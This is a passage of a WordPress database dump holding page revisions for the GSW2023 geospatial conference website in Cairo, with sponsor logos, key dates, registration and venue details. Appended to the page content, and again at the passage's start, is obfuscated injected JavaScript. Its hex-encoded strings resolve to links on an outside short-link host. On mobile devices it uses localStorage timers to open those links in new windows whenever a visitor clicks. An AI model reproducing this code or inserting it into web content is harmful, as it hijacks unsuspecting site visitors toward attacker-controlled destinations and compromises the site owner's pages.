Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-13 17:24:09','2023-04-13 17:24:09','',3066,'https://gsw2023.com/?p=4042',0,'revision','',0),
(4043,1,'2023-04-13 17:24:49','2023-04-13 17:24:49','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406007049{margin-top: px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 